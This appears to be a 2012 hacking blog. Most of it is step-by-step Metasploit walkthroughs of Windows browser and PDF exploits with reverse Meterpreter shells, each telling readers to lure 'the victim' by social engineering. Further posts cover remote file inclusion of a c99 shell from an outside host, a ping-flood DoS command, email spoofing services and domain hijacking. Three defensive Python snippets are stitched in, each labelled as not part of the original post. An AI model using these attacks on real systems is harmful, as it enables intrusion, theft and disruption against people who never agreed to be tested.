Saturday, September 29, 2012

How to Hack Windows 7 using Metasploit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Requirement


metasploit

Windows 7

Open a terminal and type

msfconsole

use auxiliary/server/browser_autopwn

show options


Now set LHOST, PORT and URIPATH

Msf auxiliary(browser_autopwn) > set lhost 192.168.1.4 (The IP address of your computer)

Msf auxiliary(browser_autopwn) > set port 4444 (The default port of your Metasploit program)

Msf auxiliary(browser_autopwn) > set uripath /

Msf auxiliary(browser_autopwn) > exploit (to launch an exploit on the targeted machine)

Send the link of the server to the victim via chat or email or any social engineering technique.

You now have access to the victim's PC. Use “sessions -l” and the session number to connect to the session, then type “sessions -i ID”.

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Exploit Targets


0 – Automatic (default)

1 – Internet Explorer 8

2 – Internet Explorer 7

3 – Internet Explorer 6

4 – Debug Target (Crash)

Requirement


Attacker: metasploit

Victim PC: Windows 7

Open a terminal and type

msfconsole

use exploit/windows/browser/ms11_003_ie_css_import

Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms11_003_ie_css_import)>set uripath newhackingvideos (The Url to use for this exploit)

Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms11_003_ie_css_import)>exploit


Now the URL you should give to your victim is http://192.168.1.4/newhackingvideos.avi

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session, then type “sessions -i ID”.

Hack Remote XP using Heap Overflow Attack

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than what is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for the IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Exploit Targets


Windows XP service pack 2

Windows XP service pack 3

Requirement



Attacker: metasploit

Victim PC: Windows XP

Open a BackTrack terminal and type

msfconsole


Now type

use exploit/windows/browser/ms12_004_midi

Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms12_004_midi)>set port 4444 (Port of Local PC)

Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)

Msf exploit (ms12_004_midi)>exploit


Now the URL you should give to your victim is http://192.168.1.4/salesreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session, then type “sessions -i ID”.

Hack Windows XP using Shell Link Code Execution

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement


Attacker: metasploit

Victim PC: Windows XP

Open a terminal and type

msfconsole

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Msf exploit(ms10_046_shortcut_icon_dllloader)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_046_shortcut_icon_dllloader)>set lhost 192.168.1.6 (IP of Local Host)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set srvhost 192.168.1.6 (This must be an address on the local machine)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set uripath / (The Url to use for this exploit)

Msf exploit (ms10_046_shortcut_icon_dllloader)>exploit

Now the URL you should give to your victim is http://192.168.1.6/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session, then type “sessions -i ID”.

Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.

The attack has been aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.

Exploit Targets

Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8

Operating System: Windows Vista, Windows 7, Windows Server 2008

Requirement


Attacker: metasploit

Victim PC: Windows XP

Open a terminal and type

msfconsole

use exploit/windows/browser/ms10_002_aurora

Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms10_002_aurora)>set uripath meeting (The Url to use for this exploit)

Msf exploit (ms10_002_aurora)>exploit

Now the URL you should give to your victim is http://192.168.1.4/meeting

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session, then type “sessions -i ID”.

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English)

Requirement


Attacker: metasploit

Victim PC: Windows XP

Open a terminal and type

msfconsole

use exploit/windows/browser/adobe_jbig2decode

Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (adobe_jbig2decode)>set uripath akonsong (The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Now the URL you should give to your victim is http://192.168.1.4:8080/akonsong

When the victim opens that link in their browser, it will immediately show a dialog box about the akonsong PDF.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session, then type “sessions -i ID”.

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.

Exploit Targets

0 – Automatic (default)

Requirement

Victim PC: Windows XP

Open a BackTrack terminal and type

msfconsole

use exploit/windows/browser/adobe_cooltype_sing

Msf exploit(adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_cooltype_sing)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.1.3 (This must be an address on the local machine)

Msf exploit (adobe_cooltype_sing)>set uripath finalreport (The Url to use for this exploit)

Msf exploit (adobe_cooltype_sing)>exploit

Now the URL you should give to your victim is http://192.168.1.3/finalreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session, then type “sessions -i ID”.

Hack Remote PC using Sun Java Command Line Injection

Sun Java Web Start Plugin Command Line Argument Injection

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.

Exploit Targets

0 – Automatic (default)

1 – Java Runtime on Windows x86

Requirement

Attacker: metasploit

Victim PC: Windows XP

Open a BackTrack terminal and type

msfconsole

use exploit/windows/browser/java_ws_vmargs

Msf exploit(java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_ws_vmargs)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (java_ws_vmargs)>set srvhost 192.168.1.3 (This must be an address on the local machine)

Msf exploit (java_ws_vmargs)>set srvport 80

Msf exploit (java_ws_vmargs)>set uripath / (The Url to use for this exploit)

Msf exploit (java_ws_vmargs)>exploit

Now the URL you should give to your victim is http://192.168.1.3/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session, then type “sessions -i ID”.

How to Hack Remote PC using pdf

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement

Attacker: metasploit

Victim PC: Windows XP

Open a terminal and type

msfconsole

use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit(adobe_flatedecode_predictor02)>show options

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf

Msf exploit (adobe_flatedecode_predictor02)>exploit

After we successfully generate the malicious PDF, it will be stored on your local computer

/root/.msf4/local/attack.pdf

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your attack.pdf file to the victim. As soon as they download and open it, you can access a meterpreter shell on the victim computer.

Redirect Site to Another Site


A simple text file edit makes sites redirect to another. When you type an address in the address bar of any browser and enter it, it will display another web page. For example, when you type Google.com you will be redirected to yahoo.com

Instructions to do:

1) Go to this directory [c:\windows\system32\drivers\etc]; the directory may change according to the drive used for the OS installation
2) then hit enter
3) find a file named "hosts"
4) Right click on it and open with WordPad.
5) In the last line of the document type the IP* address of yahoo, a space, then www.Google.com (vice versa for other sites)
6) now save it
7) restart the browser if it's already running
8) Now try it. It works perfectly

IP*: to find the IP address of that website go to Start -> Run > type cmd > enter. Now you have a new window on the desktop. In it type this without quotes: "ping www.yahoo.com"
Replace yahoo.com with your preferred site and then press enter
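
The same edit seen from the defender's side, as an added example that is not part of the original post: a hosts-file audit that reports every entry overriding DNS for a non-local name, which is how the line added in step 5 shows up. The function name, the allowlist of expected names and the sample file contents are assumptions constructed for illustration.

```python
import ipaddress

# Names expected in an unmodified hosts file (assumed allowlist; extend per site).
EXPECTED_LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost",
                        "ip6-loopback", "broadcasthost"}

# Constructed sample, laid out like c:\windows\system32\drivers\etc\hosts.
SAMPLE_HOSTS = """\
# constructed sample, not taken from a real machine
127.0.0.1      localhost
::1            localhost
203.0.113.10   www.google.com google.com   # the kind of line step 5 adds
0.0.0.0        update.example.test
not-an-ip      intranet
"""


def audit_hosts(text, expected=EXPECTED_LOCAL_NAMES):
    """Return findings for hosts entries that override DNS for non-local names.

    Each finding is (line_number, kind, address, hostname). kind is
    "redirect" (name pinned to a routable address), "sinkhole" (name pinned
    to loopback or 0.0.0.0, which silently blocks it) or "malformed".
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop full-line and trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            # Strip an IPv6 zone id (fe80::1%eth0) before validating the address.
            addr = ipaddress.ip_address(fields[0].split("%", 1)[0])
        except ValueError:
            findings.append((lineno, "malformed", fields[0], ""))
            continue
        for name in fields[1:]:  # one line may carry several aliases
            host = name.rstrip(".").lower()
            if host in expected:
                continue
            blocked = addr.is_loopback or addr.is_unspecified
            kind = "sinkhole" if blocked else "redirect"
            findings.append((lineno, kind, str(addr), host))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

Running the function on a schedule and alerting on any new "redirect" or "sinkhole" finding catches this change without relying on the user noticing the wrong site.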

How to Do Remote File Inclusion?

Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.

Many servers are vulnerable to this kind of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been deprecated and removed, many websites still rely on older versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website.


1. First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google’s provided search tools to help get a specific search result.

2. Websites that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName

3. To see if the page is vulnerable, the hacker would try to include a site instead of PageName like the following:
http://target-site.com/index.php?page=http://google.com

4.If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.

5. A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?

6.Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.

7. In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page=. This looks for URLs with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

8.If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:

The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell but this time as a .php file so that in case the vulnerability is fixed, he will be able to access it later on.

9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain usernames and passwords for the MySQL databases and such.

To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure your server's php.ini file has register_globals and allow_url_fopen disabled.
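
Alongside those php.ini settings, the probes from steps 3 to 6 are easy to spot in a web server access log. The following is an added example, not part of the original post: it flags requests where a query parameter value is itself a URL or carries an encoded null byte. The function names, the reason labels and the log lines are assumptions constructed for illustration (documentation IP ranges and a placeholder host).

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a common/combined log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that is itself a URL or a PHP stream wrapper.
REMOTE_VALUE_RE = re.compile(
    r"^\s*(?:https?|ftps?|php|data|expect)://|^\s*data:", re.I)

# Constructed sample log lines.
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Sep/2012:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.9 - - [29/Sep/2012:10:02:10 +0000] "GET /index.php?page=http://google.com HTTP/1.1" 200 9100',
    '198.51.100.9 - - [29/Sep/2012:10:02:41 +0000] "GET /index.php?page=http%3A%2F%2Fsite.example%2Fc99.txt%3F HTTP/1.1" 200 20480',
    '198.51.100.9 - - [29/Sep/2012:10:03:05 +0000] "GET /index.php?page=http://site.example/c99.txt%2500 HTTP/1.1" 200 20480',
    '203.0.113.4 - - [29/Sep/2012:10:04:00 +0000] "GET /search.php?q=how+to+use+http HTTP/1.1" 200 811',
]


def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are seen in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_lines):
    """Return (client_ip, path, parameter, reason) for each suspicious value."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        client = line.split(" ", 1)[0]
        parts = urlsplit(match.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_unquote(value)
            if REMOTE_VALUE_RE.search(value):
                hits.append((client, parts.path, name, "remote-url-in-parameter"))
            if "\x00" in value:
                hits.append((client, parts.path, name, "null-byte"))
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 response and an unusually large body is the case to investigate first, since it suggests the include actually ran.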

Friday, September 28, 2012

DOS ATTACK ON WEBSITE.

DOWNLOAD TOOL FROM HERE.
ALTHOUGH IT SHOWS THAT THE FILE IS VIRUS INFECTED, IT'S NOT.
PLACE THE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE & PRESS ENTER.

OR YOU CAN DO IT MANUALLY ALSO. JUST OPEN CMD & TYPE THE COMMAND. BUT IT'S AN OLD METHOD, SO I RECOMMEND YOU TO USE THE TOOL.

ping (Ip Address) -t -l 65000

IF YOU WANT TO KNOW MORE ABOUT IT. PLEASE READ FOLLOWING DOCUMENT.
IT HAS EXPLAINED EVERYTHING. CLICK HERE.

Wednesday, September 26, 2012

How to Find i.p Address of Remote computer?

This is the article about getting the IP address of the remote computer, i.e. in terms of hacking, getting the IP address of the victim computer.
Before proceeding let's know something about IP address.

0x01-What is IP address?
IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

Tuesday, September 25, 2012

Using nmap to change a source address

Using nmap to change a source address. The commands used are:
nmap -iflist
...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:
nmap -e eth0 -S 192.168.1.100 192.168.1.109
...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be closed.



How To change your I.P address?

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.


1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".

2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:
Windows IP Configuration:

Monday, September 24, 2012

how to install metasploit in ubuntu?


(1) First download the latest version of metasploit for Linux from here.

(2) The next step is to move the downloaded file into your home folder. We want to make the run file executable, so run the following command in your terminal.

(3) sudo chmod +x metasploit-latest-linux-installer.run

(4) sudo ./metasploit-latest-linux-installer.run
After that the uncompress process will start & it will install automatically.
Follow some basic steps & get the activation code.
Open a terminal & run the following command

(5) msfconsole
It will show
msf>


Friday, September 21, 2012

List of Useful Hacking Tools

Here I am listing some good free hacking software which is very useful to hack any system. Download from HERE.

(1)NESSUS-Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $1,200 per year, which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.

Nessus is constantly updated, with more than 46,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. The open-source version of Nessus was forked by a group of users who still develop it under the OpenVAS name.

What is TELNET ? & How to Use TELNET?


Telnet: the Number One Hacker Tool

In this Guide you will learn:
· What is telnet?
· How to telnet
· How to get telnet accounts
· Why you might not want to telnet
· How to install a telnet server on your home Windows computer
· How to turn off a telnet server on your home Linux computer
· How to explore computers using telnet
· Why not use a portscanner instead?
· How to break into web sites using telnet
"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking. I wrote those guides back when the Internet was in its infancy and almost everyone in cyberspace used telnet. However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day.

Domain Hijacking – How to Hijack a Domain

Domain hijacking is a process by which Internet Domain Names are stolen from their legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of a domain name is as follows
Any website, say for example gohacking.com, consists of two parts: the domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of the domain name with the web hosting server is done as follows.

How to Spoof an Email Addresses?

If you want to send email from your friend's email address then you can use the following services. Keep in mind that they do not actually send email from your friend's mail address, but the person who receives the email sees your friend's email address as the sender.

www.hoaxmail.co.uk

anonymailer.net 

emkei.cz

Above all, emkei.cz is my favourite because it provides some advanced options like email header, reply-to, cc etc.

You can also send from your cmd, but for that purpose you need the S.M.T.P server name of your I.S.P., so use the above services only for fun.
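
Because the recipient only sees the forged From address, the place to catch such a message is in its other headers. The following is an added example, not part of the original post: it compares the From domain with Return-Path and Reply-To and reads the SPF, DKIM and DMARC verdicts from the Authentication-Results header written by the receiving mail server. The function names, the finding labels, the trusted server name mx.example.org and both sample messages are assumptions constructed for illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: a message sent through a web form with a forged From.
SPOOFED = """\
Return-Path: <www-data@mailer.example.net>
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=mailer.example.net;
 dkim=none; dmarc=fail header.from=example.com
From: "Your Friend" <friend@example.com>
Reply-To: someone@example.net
To: you@example.org
Subject: hello

body
"""

# Constructed sample: the same sender address on a properly authenticated message.
LEGIT = """\
Return-Path: <bounce@mail.example.com>
Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=mail.example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
From: Friend <friend@example.com>
To: you@example.org
Subject: hi

body
"""


def domain_of(header_value):
    """Lower-cased domain of the address in a header, or '' if there is none."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def sender_findings(raw_message, trusted_authserv="mx.example.org"):
    """Return a list of reasons to distrust the visible From address."""
    msg = message_from_string(raw_message)
    from_dom = domain_of(msg.get("From"))
    findings = []
    for header, label in (("Return-Path", "return-path-mismatch"),
                          ("Reply-To", "reply-to-mismatch")):
        dom = domain_of(msg.get(header))
        if dom and dom != from_dom and not dom.endswith("." + from_dom):
            findings.append(label)
    verdicts = {}
    for value in msg.get_all("Authentication-Results", []):
        tokens = value.split(";", 1)[0].split()
        # Only believe results stamped by our own server; a sender can add fake ones.
        if not tokens or tokens[0].lower() != trusted_authserv:
            continue
        verdicts.update(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", value.lower()))
    for mech in ("spf", "dkim", "dmarc"):
        verdict = verdicts.get(mech, "missing")
        if verdict != "pass":
            findings.append(f"{mech}-{verdict}")
    return findings


if __name__ == "__main__":
    print(sender_findings(SPOOFED))
    print(sender_findings(LEGIT))
```

SPF alone passes in the spoofed sample because it validates the envelope sender, not the From header the reader sees, which is why the DMARC verdict matters.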

Friday, September 14, 2012

BSNL search & Reliance Mobile search

If you want to inquire about any BSNL residential number, the link is below
http://dq.wdc.bsnl.co.in/bsnl-web/residentialSearch.seam

And if you want to know the details of any Reliance number, the link is below. But unfortunately it now provides only the surname or first name.

http://myservices.relianceada.com/captureInstantRecharge.do

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

Nmap is a powerful scanner available on Unix/Linux systems. It’s very useful for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.

It’s very easy to install nmap in Ubuntu, just download from the internet.

sudo apt-get install nmap

In this practice, I used 2 computers.

PC-01, IP = 192.168.0.3 (OpenSuse 10.1) with Kernel 2.6.16.13-4-default


PC-02, IP = 192.168.0.2 (Ubuntu Feisty)


I run nmap from Ubuntu to scan PC-01.

IP Scanning with range 192.168.0.0 – 192.168.0.255

sudo nmap -sP 192.168.0.0/24

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:51 WIT

Host 192.168.0.2 appears to be up.

caught SIGINT signal, cleaning up



IP Scanning with range 192.168.0.1 – 192.168.0.254

sudo nmap -sP 192.168.0.1-254


Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:53 WIT

Host 192.168.0.2 appears to be up.

Host 192.168.0.3 appears to be up.

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Nmap finished: 255 IP addresses (2 hosts up) scanned in 31.242 seconds


Port Scanning with range port 100 – port 139

sudo nmap 192.168.0.3 -p100-139


Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:06 WIT

Interesting ports on 192.168.0.3:

Not shown: 38 filtered ports

PORT STATE SERVICE

113/tcp closed auth

139/tcp open netbios-ssn

Nmap finished: 1 IP address (1 host up) scanned in 24.914 seconds


For 40 ports, it took almost 25 seconds, so it will take much longer if you want to scan from 1-65535 (all ports on a computer).

Scanning Operating system on target IP

sudo nmap -O 192.168.0.3


Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:20 WIT

Interesting ports on 192.168.0.3:

Not shown: 1693 filtered ports

PORT STATE SERVICE

80/tcp open http

113/tcp closed auth

139/tcp open netbios-ssn

445/tcp open microsoft-ds

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Device type: general purpose|specialized|WAP|storage-misc

Running (JUST GUESSING):Linux 2.6.X|2.4.X (97%), Atmel Linux 2.6.X (91%), Siemens linux (91%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Inventel embedded (88%)

Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (91%), Siemens Gigaset SE515dsl wireless broadband router (91%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 94.942 seconds

nmap Faster Execution


If you want to make a faster scan, use the -T4 option on the nmap command.

sudo nmap -A -T4 192.168.0.3


Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:42 WIT

Interesting ports on 192.168.0.3:

Not shown: 1693 filtered ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.0 ((Linux/SUSE))

113/tcp closed auth

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Device type: general purpose|WAP|specialized|storage-misc|broadband router

Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Siemens linux (93%), Atmel Linux 2.6.X (92%), Inventel embedded (89%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Netgear embedded (87%)

Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Siemens Gigaset SE515dsl wireless broadband router (93%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (93%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (92%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 58.830 seconds
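
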